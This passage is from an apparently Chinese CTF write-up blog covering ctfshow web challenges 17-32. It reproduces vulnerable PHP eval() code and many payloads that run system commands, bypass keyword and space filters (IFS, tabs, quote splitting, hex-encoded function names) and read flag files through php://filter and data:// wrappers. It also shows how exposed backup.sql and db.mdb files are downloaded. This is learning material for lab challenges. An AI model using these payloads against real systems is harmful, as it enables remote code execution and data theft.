<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> &lt;!--</span><br><span class="line">    <span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line">    <span class="variable">$flag</span>=<span class="string">&quot;fakeflag&quot;</span></span><br><span class="line">    <span class="variable">$u</span> = <span class="variable">$_POST</span>[<span class="string">&apos;username&apos;</span>];</span><br><span class="line">    <span class="variable">$p</span> = <span class="variable">$_POST</span>[<span class="string">&apos;pazzword&apos;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$u</span>) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$p</span>)){</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$u</span>===<span class="string">&apos;admin&apos;</span> &amp;&amp; <span class="variable">$p</span> ===<span class="string">&apos;a599ac85a73384ee3219fa684296eaa62667238d608efa81837030bd1ce1bf04&apos;</span>){</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        }</span><br><span class="line">}</span><br><span class="line">    --&gt;</span><br></pre></td></tr></table></div></figure>

<p>&#x7528;post&#x4F20;&#x53C2;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin&amp;&amp;pazzword=a599ac85a73384ee3219fa684296eaa62667238d608efa81837030bd1ce1bf04</span><br></pre></td></tr></table></div></figure>


        <h4 id="20">
          <a href="#20" class="heading-link"><i class="fas fa-link"></i></a><a href="#20" class="headerlink" title="20"></a>20</h4>
      <p>mdb&#x6587;&#x4EF6;&#x662F;&#x65E9;&#x671F;asp+access&#x6784;&#x67B6;&#x7684;&#x6570;&#x636E;&#x5E93;&#x6587;&#x4EF6; &#x76F4;&#x63A5;&#x67E5;&#x770B;url&#x8DEF;&#x5F84;&#x6DFB;&#x52A0;/db/db.mdb &#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#x901A;&#x8FC7;txt&#x6253;&#x5F00;&#x6216;&#x8005;&#x901A;&#x8FC7;EasyAccess.exe&#x6253;&#x5F00;&#x641C;&#x7D22;flag flag{ctfshow_old_database}</p>
<p>&#x6211;&#x81EA;&#x5DF1;&#x505A;&#xFF1A;</p>
<p>&#x4E0B;&#x6587;&#x4EF6;&#xFF0C;&#x8BB0;&#x4E8B;&#x672C;&#x6253;&#x5F00;&#xFF0C;&#x6709;&#x4E00;&#x5806;&#x4E71;&#x7801;&#xFF0C;&#x4E71;&#x7801;&#x4E2D;&#x6709;&#x4E00;&#x4E9B;&#x6B63;&#x5E38;&#x7684;&#x4E2D;&#x6587;&#xFF0C;&#x7528;Ctrl+f&#x641C;&#x7D22;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;flag</p>
<p>EasyAccess.exe&#x662F;&#x4E2A;&#x6570;&#x636E;&#x5E93;&#x67E5;&#x770B;&#x5668;</p>

        <h4 id="17">
          <a href="#17" class="heading-link"><i class="fas fa-link"></i></a><a href="#17" class="headerlink" title="17"></a>17</h4>
      <p>&#x8003;&#x70B9;&#xFF1A;backup.sql</p>
<p>&#x4E0B;&#x8F7D;&#x8BE5;&#x6587;&#x4EF6;&#x8BBF;&#x95EE;&#x5C31;&#x53EF;&#x627E;&#x5230;flag</p>

        <h5 id="&#x603B;&#x7ED3;">
          <a href="#&#x603B;&#x7ED3;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x603B;&#x7ED3;" class="headerlink" title="&#x603B;&#x7ED3;"></a>&#x603B;&#x7ED3;</h5>
      <p>&#x76EE;&#x524D;&#x8FD8;&#x6709;&#x5BF9;<code>tz.php</code>,<code>asp+access</code>&#x4E0D;&#x592A;&#x719F;&#x6089;&#xFF0C;</p>
<p>PHP&#x63A2;&#x9488;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6587;&#x4EF6;&#x7684;&#x7EDD;&#x5BF9;&#x8DEF;&#x5F84;&#x4E4B;&#x7C7B;&#x7684;&#x4E1C;&#x897F;&#x3002;</p>
<p>asp+access&#x662F;&#x786E;&#x5B9E;&#x4E0D;&#x592A;&#x61C2;&#xFF0C;&#x4E5F;&#x8BB8;&#x4F1A;&#x4ECE;&#x51E0;&#x4E2A;&#x5E38;&#x89C4;&#x7684;&#x5173;&#x952E;&#x6587;&#x4EF6;&#x6CC4;&#x9732;</p>
<p>(&#x4F9D;&#x7A00;&#x8BB0;&#x5F97;&#x6709;&#x4E2A;.asp&#x6587;&#x4EF6;&#x6709;&#x5173;&#x7684;&#x9898;&#x76EE;)</p>
<ol>
<li>tz.php</li>
<li>asp+access</li>
<li>backup.sql</li>
</ol>
<p><strong>&#x8BB0;&#x5F97;&#x56DE;&#x987E;&#x55F7;&#x55F7;&#x55F7;</strong></p>

        <h2 id="5-4">
          <a href="#5-4" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-4" class="headerlink" title="5.4"></a>5.4</h2>
      
        <h4 id="29">
          <a href="#29" class="heading-link"><i class="fas fa-link"></i></a><a href="#29" class="headerlink" title="29"></a>29</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: h1xa</span><br><span class="line"># @Date:   2020-09-04 00:12:34</span><br><span class="line"># @Last Modified by:   h1xa</span><br><span class="line"># @Last Modified time: 2020-09-04 00:26:48</span><br><span class="line"># @email: h1xa@ctfer.com</span><br><span class="line"># @link: https://ctfer.com</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&apos;c&apos;])){</span><br><span class="line">    $c = $_GET[&apos;c&apos;];</span><br><span class="line">    if(!preg_match(&quot;/flag/i&quot;, $c)){</span><br><span class="line">        eval($c);</span><br><span class="line">    }</span><br><span class="line">    </span><br><span class="line">}else{</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">}</span><br></pre></td></tr></table></div></figure>

<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">?c=system(&apos;tac f*&apos;);</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=system(&quot;cat f*&quot;);</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=system(&apos;ls&apos;);</span><br><span class="line">?c=system(&quot;tac *.php&quot;);</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=echo `tac *.*`;</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=echo `tac *`;</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=include($_GET[1]);&amp;1=php://filter/read=convert.base64-encode/resource=flag.php</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=echo `nl fl&apos;&apos;ag.php`;</span><br><span class="line">&#x6216;&#x8005;</span><br><span class="line">?c=eval($_GET[1]);&amp;1=system(&quot;cat flag.php&quot;);</span><br></pre></td></tr></table></div></figure>

<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cat</span><br><span class="line">ca&apos;&apos;t</span><br><span class="line">ca\t</span><br><span class="line">ca&quot;&quot;t</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p><em>nl&#x547D;&#x4EE4;</em>&#x5728;linux&#x7CFB;&#x7EDF;&#x4E2D;&#x7528;&#x6765;&#x8BA1;&#x7B97;&#x6587;&#x4EF6;&#x4E2D;&#x884C;&#x53F7;&#x3002;nl &#x53EF;&#x4EE5;&#x5C06;&#x8F93;&#x51FA;&#x7684;&#x6587;&#x4EF6;&#x5185;&#x5BB9;&#x81EA;&#x52A8;&#x7684;&#x52A0;&#x4E0A;&#x884C;&#x53F7;</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#x522B;&#x4EBA;&#x7684;&#x535A;&#x5BA2;</span><br><span class="line"><span class="number">1</span>.&#x901A;&#x914D;&#x7B26;fla?&#x7ED5;&#x8FC7;flag&#x68C0;&#x6D4B;</span><br><span class="line"><span class="number">2</span>.c=<span class="keyword">echo</span> `nl fl\ag.php`;<span class="comment">//&#x8F6C;&#x4E49;&#x5B57;&#x7B26;&#x7ED5;&#x8FC7;</span></span><br><span class="line"><span class="number">3</span>.&#x901A;&#x8FC7;&#x53D8;&#x91CF;&#x8D4B;&#x503C;&#x76F4;&#x63A5;&#x7ED5;&#x8FC7;c&#x7684;&#x8FC7;&#x6EE4; c=<span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="number">1</span>]);&amp;<span class="number">1</span>=php:<span class="comment">//filter/read=convert.base64-encode/resource=flag.php</span></span><br><span class="line"><span class="number">4</span>.c=<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="number">1</span>]);&amp;<span class="number">1</span>=<span class="title function_ invoke__">system</span>(<span class="string">&apos;nl flag.php&apos;</span>);</span><br><span class="line"></span><br><span class="line"><span class="number">5</span>.linux&#x547D;&#x4EE4;</span><br><span class="line">    c=awk <span class="string">&apos;{printf $0}&apos;</span> flag.php||&#x8FD9;&#x4E2A;&#x65B9;&#x6CD5;&#x6CA1;&#x8BD5;&#x6210;&#x529F;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h4 id="30">
          <a href="#30" class="heading-link"><i class="fas fa-link"></i></a><a href="#30" class="headerlink" title="30"></a>30</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&apos;c&apos;])){</span><br><span class="line">    $c = $_GET[&apos;c&apos;];</span><br><span class="line">    if(!preg_match(&quot;/flag|system|php/i&quot;, $c)){</span><br><span class="line">        eval($c);</span><br><span class="line">    }</span><br><span class="line">    </span><br><span class="line">}else{</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">}</span><br></pre></td></tr></table></div></figure>



<p>payload&#x5982;&#x4E0B;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?c=echo `cat *.*`;</span><br><span class="line"></span><br><span class="line">?c=passthru(&quot;cat *.*&quot;);</span><br><span class="line"></span><br><span class="line">?c=echo `nl *.*`;</span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#x53EF;&#x4EE5;&#x7528;&#x4E8E;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;</span><br><span class="line">system()</span><br><span class="line">passthru()</span><br><span class="line">exec()</span><br><span class="line">shell_exec()</span><br><span class="line">popen()</span><br><span class="line">proc_open()</span><br><span class="line">pcntl_exec()</span><br><span class="line">&#x53CD;&#x5F15;&#x53F7; &#x540C;shell_exec() </span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">readfile()			&#x8BFB;&#x53D6;&#x6587;&#x4EF6;</span><br><span class="line">highlight_file()	&#x8BFB;&#x6587;&#x4EF6;</span><br><span class="line">show_source()		&#x540C;&#x4E0A;</span><br><span class="line">base64_decode()		base64&#x89E3;&#x7801;</span><br><span class="line">strrev()			&#x53CD;&#x8F6C;&#x5B57;&#x7B26;&#x4E32;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>




        <h4 id="31">
          <a href="#31" class="heading-link"><i class="fas fa-link"></i></a><a href="#31" class="headerlink" title="31"></a>31</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&apos;c&apos;])){</span><br><span class="line">    $c = $_GET[&apos;c&apos;];</span><br><span class="line">    if(!preg_match(&quot;/flag|system|php|cat|sort|shell|\.| |\&apos;/i&quot;, $c)){</span><br><span class="line">        eval($c);</span><br><span class="line">    }</span><br><span class="line">    </span><br><span class="line">}else{</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">}</span><br></pre></td></tr></table></div></figure>



<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">IFS&#x8868;&#x793A; Internal Field Separator &#xFF08;&#x5185;&#x90E8;&#x5B57;&#x6BB5;&#x5206;&#x9694;&#x7B26;&#xFF09;</span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&#x5728;linux &#x7A7A;&#x683C;&#x53EF;&#x4EE5;&#x7528;&#x4EE5;&#x4E0B;&#x5B57;&#x7B26;&#x4E32;&#x4EE3;&#x66FF;&#xFF1A;</span><br><span class="line"></span><br><span class="line">%09(tab)&#x3001;$IFS$9&#x3001; ${IFS}&#x3001;$IFS%09(tab)&#x3001;&lt; &#x3001;&lt;&gt;&#x3001;%20(space)&#x7B49;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">cat%09flag</span><br><span class="line">{cat,flag.txt}</span><br><span class="line">cat${IFS}flag.txt</span><br><span class="line">cat$IFS$9flag.txt</span><br><span class="line">cat&lt;flag.txt</span><br><span class="line">cat&lt;&gt;flag.txt</span><br><span class="line">ca\t fl\ag</span><br><span class="line">&#x591A;&#x8BD5;&#x8BD5;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&#x4EE3;&#x66FF;cat</span><br><span class="line">more:	&#x4E00;&#x9875;&#x4E00;&#x9875;&#x7684;&#x663E;&#x793A;&#x6863;&#x6848;&#x5185;&#x5BB9;</span><br><span class="line">less:	&#x4E0E; more &#x7C7B;&#x4F3C; head:&#x67E5;&#x770B;&#x5934;&#x51E0;&#x884C;</span><br><span class="line">tac:	&#x4ECE;&#x6700;&#x540E;&#x4E00;&#x884C;&#x5F00;&#x59CB;&#x663E;&#x793A;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA; tac &#x662F;cat &#x7684;&#x53CD;&#x5411;&#x663E;&#x793A;</span><br><span class="line">tail:	&#x67E5;&#x770B;&#x5C3E;&#x51E0;&#x884C;</span><br><span class="line">nl:		&#x663E;&#x793A;&#x5185;&#x5BB9;&#xFF0C;&#x987A;&#x4FBF;&#x8F93;&#x51FA;&#x884C;&#x53F7;</span><br><span class="line">od:		&#x4EE5;&#x4E8C;&#x8FDB;&#x5236;&#x7684;&#x65B9;&#x5F0F;&#x8BFB;&#x53D6;&#x6863;&#x6848;&#x5185;&#x5BB9;</span><br><span class="line">vi:		&#x4E00;&#x79CD;&#x7F16;&#x8F91;&#x5668;&#xFF0C;&#x8FD9;&#x4E2A;&#x4E5F;&#x53EF;&#x4EE5;&#x67E5;&#x770B;</span><br><span class="line">vim:	&#x4E00;&#x79CD;&#x7F16;&#x8F91;&#x5668;&#xFF0C;&#x8FD9;&#x4E2A;&#x4E5F;&#x53EF;&#x4EE5;&#x67E5;&#x770B;</span><br><span class="line">sort:	&#x6587;&#x4EF6;&#x6392;&#x5E8F;&#x5E76;&#x8F93;&#x51FA;&#x4E5F;&#x53EF;&#x4EE5;&#x67E5;&#x770B;&#x5185;&#x5BB9;</span><br><span class="line">uniq:	&#x53EF;&#x4EE5;&#x67E5;&#x770B; file -f:&#x62A5;&#x9519;&#x51FA;&#x5177;&#x4F53;&#x5185;&#x5BB9; grep</span><br><span class="line">strings: &#x5728;&#x5BF9;&#x8C61;&#x6587;&#x4EF6;&#x6216;&#x4E8C;&#x8FDB;&#x5236;&#x6587;&#x4EF6;&#x4E2D;&#x67E5;&#x627E;&#x53EF;&#x6253;&#x5370;&#x7684;&#x5B57;&#x7B26;&#x4E32;, &#x5728;&#x5F53;&#x524D;&#x76EE;&#x5F55;&#x4E2D;&#xFF0C;&#x67E5;&#x627E;&#x540E;&#x7F00;&#x6709; file &#x5B57;&#x6837;&#x7684;&#x6587;&#x4EF6;&#x4E2D;&#x5305;&#x542B; test &#x5B57;&#x7B26;&#x4E32;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x5E76;&#x6253;&#x5370;&#x51FA;&#x8BE5;&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x884C;&#x3002;&#x6B64;&#x65F6;&#xFF0C;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x5982;&#x4E0B;&#x547D;&#x4EE4;&#xFF1A; grep test *file strings</span><br><span class="line">paste	&#x628A;&#x6BCF;&#x4E2A;&#x6587;&#x4EF6;&#x4EE5;&#x5217;&#x5BF9;&#x5217;&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x4E00;&#x5217;&#x5217;&#x5730;&#x52A0;&#x4EE5;&#x5408;&#x5E76;</span><br><span class="line">grep	grep { flag.php&#x6253;&#x5370;&#x6709;&#x201D;{&#x201C;&#x7684;&#x4E00;&#x884C;</span><br><span class="line">sed		&#x4E00;&#x79CD;&#x7F16;&#x8F91;&#x5668;&#xFF0C;&#x53EF;&#x4EE5;&#x7528;sed -f flag.php&#x8BFB;&#x53D6;flag</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>payload</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?c=echo%09(`tac%09f*`);</span><br><span class="line"></span><br><span class="line">?c=eval($GET_[1]);&amp;1=system(&quot;cat%09f*&quot;);</span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&#x522B;&#x4EBA;&#x7684;payload</span><br><span class="line">c=echo(`tac%09fl*`);</span><br><span class="line">c=eval($_GET[1]);&amp;1=system(&apos;nl flag.php&apos;);</span><br><span class="line">// bug&#x7EA7;&#x522B;&#x5B58;&#x5728;,&#x4E5F;&#x53EF;&#x4EE5;&#x7528;&#x4F2A;&#x534F;&#x8BAE;&#x8BFB;&#x6587;&#x4EF6;</span><br><span class="line">c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));</span><br><span class="line">//&#x67E5;&#x770B;&#x5F53;&#x524D;&#x76EE;&#x5F55;&#x4E0B;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x53CD;&#x5411;&#x627E;&#x5230;flag.php,&#x9AD8;&#x4EAE;&#x663E;&#x793A;</span><br><span class="line">c=show_source(next(array_reverse(scandir(pos(localeconv())))));</span><br><span class="line">c=echo(`nl%09fl[abc]*`); //&#x901A;&#x914D;&#x7B26;</span><br><span class="line">c=&quot;\x73\x79\x73\x74\x65\x6d&quot;(&quot;nl%09fl[a]*&quot;); //&#x7B49;&#x4EF7;&#x4E8E;system()</span><br><span class="line">c=echo`strings%09f*`;</span><br><span class="line">c=echo`strings\$IFS\$9f*`&#x5FC5;&#x987B;&#x52A0;&#x8F6C;&#x4E49;&#x5B57;&#x7B26;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h4 id="32">
          <a href="#32" class="heading-link"><i class="fas fa-link"></i></a><a href="#32" class="headerlink" title="32"></a>32</h4>
      <p>&#x5206;&#x53F7;&#x7528;<code>?&gt;</code>&#x4EE3;&#x66FF;<code>;</code></p>
<p>&#x7528;&#x7684;&#x5C31;&#x662F;&#x4F2A;&#x534F;&#x8BAE;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?c=include&quot;$_POST[1]&quot;?&gt;</span><br><span class="line">#&#x518D;post</span><br><span class="line">1=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></div></figure>

<p>&#x522B;&#x4EBA;&#x7684;payload&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1.c=include$_GET[1]?&gt;&amp;1=php://filter/convert.base64-encode/resource=index.php</span><br><span class="line">2.c=include$_GET[1]?&gt;&amp;1=data://text/plain,&lt;?php system(&quot;cat flag.php&quot;);?&gt; </span><br><span class="line">//f12&#x67E5;&#x770B;&#x6E90;&#x7801;&#x53EF;&#x4EE5;&#x770B;&#x5230;flag</span><br><span class="line">3.c=include$_GET[1]?&gt;&amp;1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== </span><br><span class="line">//&#x548C;&#x7B2C;&#x4E8C;&#x79CD;&#x65B9;&#x6CD5;&#x4F2A;&#x534F;&#x8BAE;&#x4E00;&#x81F4;&#xFF0C;&#x591A;&#x52A0;&#x4E86;&#x4E00;&#x5C42;base64</span><br><span class="line">4.c=include$_GET[1]?&gt;&amp;1=&#x5404;&#x79CD;&#x4F2A;&#x534F;&#x8BAE;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x603B;&#x7ED3;&#xFF1A;</p>
<ol>
<li>&#x590D;&#x4E60;&#x4E86;&#x8FC7;&#x6EE4;</li>
<li>&#x5404;&#x79CD;&#x4F2A;&#x534F;&#x8BAE;</li>
<li>&#x5B66;&#x5230;&#x4E86;nl&#x547D;&#x4EE4;</li>
<li>&#x8FD8;&#x9700;&#x8981;&#x590D;&#x4E60;&#x4E0A;&#x9762;&#x63D0;&#x5230;&#x7684;cat&#x7684;&#x66FF;&#x4EE3;&#xFF0C;system&#x66FF;&#x4EE3;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x8FD8;&#x6709;&#x5408;&#x7406;&#x4F7F;&#x7528;&#x901A;&#x914D;&#x7B26;</li>
<li>&#x8FD8;&#x9700;&#x8981;&#x590D;&#x4E60;&#x7A7A;&#x683C;&#x7684;&#x66FF;&#x4EE3;</li>
</ol>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">Kirsten Carton</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2022/04/30/4-30wp/">http://example.com/2022/04/30/4-30wp/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/web/">web</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2022/05/05/5-5wp/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">5.5wp</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/04/24/4-22wp/"><span class="paginator-prev__text">4.22wp</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Jurassic-Park"><span class="toc-number">1.</span> <span class="toc-text">
          Jurassic Park</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#extravagant"><span class="toc-number">2.</span> <span class="toc-text">
          extravagant</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#personnel"><span class="toc-number">3.</span> <span class="toc-text">
          personnel</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flaskmetal-alchemist"><span class="toc-number">4.</span> <span class="toc-text">
          flaskmetal alchemist</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E7%89%B9%E5%88%AB%E7%9A%84%E9%A2%98"><span class="toc-number"></span> <span class="toc-text">
          一些特别的题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#5-2"><span class="toc-number">1.</span> <span class="toc-text">
          5.2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#http-193-57-159-27-44757"><span class="toc-number">1.1.</span> <span class="toc-text">
          http:&#x2F;&#x2F;193.57.159.27:44757&#x2F;</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%BB%E7%BB%93%E5%87%A0%E7%A7%8D%E7%BB%95%E8%BF%87"><span class="toc-number">1.1.1.</span> <span class="toc-text">
          总结几种绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%EF%BC%88%E6%B2%A1%E7%9C%8B%E5%AE%8C%EF%BC%89"><span class="toc-number">1.1.1.0.1.</span> <span class="toc-text">
          （没看完）</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%EF%BC%88%E6%B2%A1%E7%9C%8B%E5%AE%8C%EF%BC%89-1"><span class="toc-number">1.1.1.0.2.</span> <span class="toc-text">
          （没看完）</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#show-web%E5%85%A5%E9%97%A8"><span class="toc-number">1.2.</span> <span class="toc-text">
          show web入门</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#11"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">
          11</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#12-amp-13"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          12&amp;13</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#14"><span class="toc-number">1.2.2.</span> <span class="toc-text">
